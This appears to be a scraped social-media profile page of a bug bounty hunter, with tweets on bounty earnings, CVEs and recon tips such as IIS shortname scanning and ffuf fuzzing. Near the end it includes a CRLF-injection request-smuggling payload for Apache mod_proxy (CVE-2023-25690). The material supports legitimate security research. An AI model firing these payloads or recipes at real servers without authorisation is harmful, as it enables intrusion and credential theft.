K.S.S
@0xhaxor
Followers: 1K
Following: 12K
Media: 67
Statuses: 3K
Full-Time BBH. Crossed 2 CR In Bug Bounties On all Platforms. Gamer | Hacker
India
Joined March 2015
Yay, I was awarded a $3,000 bounty on @Hacker0x01!
hackerone.com
Full time bug bounty hunter. Mostly active on Bugcrowd. -
Last month was my highest in bug bounty so far with almost $131k in bounty. Total paid reports: 18 Average reward: $7.3k Category: most were logical findings via reversing mobile applications and discovering internal endpoints leading to code execution and missing auth etc
Nexus Repository Manager 3 Unauthenticated Path Traversal (CVE-2024-4956) https://t.co/lb5CNJGqmD This issue is similar to SpringMVC CVE-2018-1271 by @orange_8361
Overwhelmed by the love from the fans in Warsaw!
Praggnanandhaa's autograph marathon in Poland! #ChessSuperstar #superbetrapidblitzpoland #grandchesstour
Decided to publish PPPwn early. The first PlayStation 4 Kernel RCE. Supporting FWs upto 11.00. https://t.co/INayQSp8fL
Pic of the Day #infosec #cybersecurity #cybersecuritytips #pentesting #cybersecurityawareness #informationsecurity
The damage of VDP programs and their Incentivization is far greater than giving some hunters "points" for farming non-bugs that they can later boast on their CV's, I believe it might actually ruin Bug Bounty platforms in the near future, Let's explore the facts So VDP's, as
Another P1 using @GodfatherOrwa tip:
- Found default IIS BLUE page
- Run tool shortscan for iis
- Found endpoint like : target~.zip
- run fuzz and found zip file with a web.config file leaking creds. Leads to Admin dashboard takeover.
#bugbountytip
Are you fuzzing like a pro? Dive into some Ffuf tuning tips that could elevate your game. 1/x #BugBounty #InfoSec #BugBountyTips #BumBumTips #HackingTips
Soon enough there will be a video for Bugcrowd Level Up explaining how I found 90% from P1s for the last 12 months with a lot of BB Tips
Directory-brute forcing? You should NEVER filter based on status code. Paths can exist and return a 404. I've seen this so many times:
/noexist/ -> 404 Not Found.
/api/ -> 404 Not Found, but different response body (JSON formatted)
/api/endpoint -> 200 OK
Filter by
You can find easy critical vulnerabilities. It just takes finding unique attack surfaces. Here's an example of how you can, using a story of how I hacked a car company:
[PoC] [CVE-2023-25690] Apache HTTP Server mod_proxy vul CLRF Injection GET /categories/1%20HTTP/1.1%0d%0aFoo:%20baarr HTTP/1.1 Host: Header Injection GET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1 Host: 1.1.1.1 https://t.co/st5iVALH8V
github.com
CVE 2023 25690 Proof of concept - mod_proxy vulnerable configuration on Apache HTTP Server versions 2.4.0 - 2.4.55 leads to HTTP Request Smuggling vulnerability. - dhmosfunk/CVE-2023-25690-POC